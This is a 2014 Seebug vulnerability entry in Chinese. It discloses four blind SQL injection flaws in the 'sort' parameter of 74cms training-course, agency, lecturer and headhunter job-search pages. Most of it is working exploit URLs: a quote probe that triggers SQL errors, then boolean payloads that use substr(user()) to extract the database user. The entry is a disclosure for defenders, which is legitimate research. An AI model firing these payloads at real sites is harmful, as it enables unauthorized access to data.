骑士CMS某新功能4处SQL注入

2014-11-05T00:00:00
ID SSV:94131
Type seebug
Reporter Root
Modified 2014-11-05T00:00:00

Description

简要描述:

骑士CMS官网某新功能4处SQL盲注,官网测试。

详细说明:

官网培训信息搜索和猎头工作搜索等4处SQL盲注。 0x01: 当前位置:首页 > 教育培训 > 课程列表 搜索课程

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc&key=

参数sort存在SQL注入,desc后面的字符串全部带入SQL:

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc%27&key=

插入',返回错误:

Error:Query error:SELECT * FROM qs_course WHERE audit=1 AND display=1 AND add_mode=1 ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

盲注: TRUE的情况:

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20limit%201%23&key=

<img src="https://images.seebug.org/upload/201411/03140342dded30ec056ed69a637cded321343ae8.png" alt="11.png" width="600" onerror="javascript:errimg(this);">

FALSE的情况:

http://demo.74cms.com/train/train-curriculum-list.php?district=&category=&sdistrict=&classtype=&start=&refre=&sort=hot%3Edesc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20limit%201%23&key=

<img src="https://images.seebug.org/upload/201411/03140428258e48a6dc063c3b4d93e6c1ac3f9545.png" alt="12.png" width="600" onerror="javascript:errimg(this);">

0x02: 当前位置:首页 > 教育培训 > 机构列表 机构列表

http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Edesc

sort参数存在SQL注入:

http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Edesc%27

插入',返回SQL错误:

Error:Query error:SELECT * FROM qs_train_profile ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

盲注TRUE的情况:

http://demo.74cms.com/train/train-agency-list.php?inforow=10&page=1&nature=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23

<img src="https://images.seebug.org/upload/201411/03140751f2c40645b5709a0a98bc8a567a6c10b2.png" alt="21.png" width="600" onerror="javascript:errimg(this);">

FALSE的情况:

<img src="https://images.seebug.org/upload/201411/03140811a089d15d088e07d8acb2d62a722741e0.png" alt="22.png" width="600" onerror="javascript:errimg(this);">

0x03:当前位置:首页 > 教育培训 > 讲师列表 讲师列表

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Edesc&inforow=

sort参数存在SQL注入:

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Edesc%27&inforow=

返回SQL错误:

Error:Query error:SELECT * FROM qs_train_teachers WHERE audit=1 ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

盲注TRUE的情况:

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&inforow=

<img src="https://images.seebug.org/upload/201411/0314123278a8a0b82c3dd84914b8a8ead773a626.png" alt="31.png" width="600" onerror="javascript:errimg(this);">

FALSE:

http://demo.74cms.com/train/train-lecturer-list.php?education=&district=&sdistrict=&sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&inforow=

<img src="https://images.seebug.org/upload/201411/031413246b3ccea64137096a4b5913c1559ab4e4.png" alt="32.png" width="600" onerror="javascript:errimg(this);">

0x04:当前位置:首页 > 高级招聘信息 > 搜索结果 搜索方式 : 全能搜索

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Edesc&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

sort存在SQL注入,注入':

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Edesc%27&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

返回SQL错误:

Error:Query error:SELECT * FROM qs_hunter_jobs ORDER BY click desc\' LIMIT 0 , 10

<img src="https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">

盲注TRUE:

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Easc,if(strcmp(substr(user(),1,14),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

<img src="https://images.seebug.org/upload/201411/0314160673a379a35d490946c9fdc1eef7c8a256.png" alt="41.png" width="600" onerror="javascript:errimg(this);">

FALSE:

http://demo.74cms.com/hunter/jobs-list.php?sort=hot%3Easc,if(strcmp(substr(user(),1,13),char(114,111,111,116,64,108,111,99,97,108,104,111,115,116)),refreshtime,click)%20desc%20limit%201%23&page=1&jobcategory=&education=&citycategory=&experience=&settr=&trade=&wage=&nature=

<img src="https://images.seebug.org/upload/201411/031416489979806f120d24b373d19b11b8e4c129.png" alt="42.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201411/03140244e466c3699c0a0ac247cc4de50d5c1dcf.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/03140703e83b35109ff3fbba86a0ed2286d3cc4e.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/03142036d560883dfb61c95c33161a648c10f7cf.png" alt="3.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201411/031418158bca6906201aa823dd81a3a81f722ab9.png" alt="4.png" width="600" onerror="javascript:errimg(this);">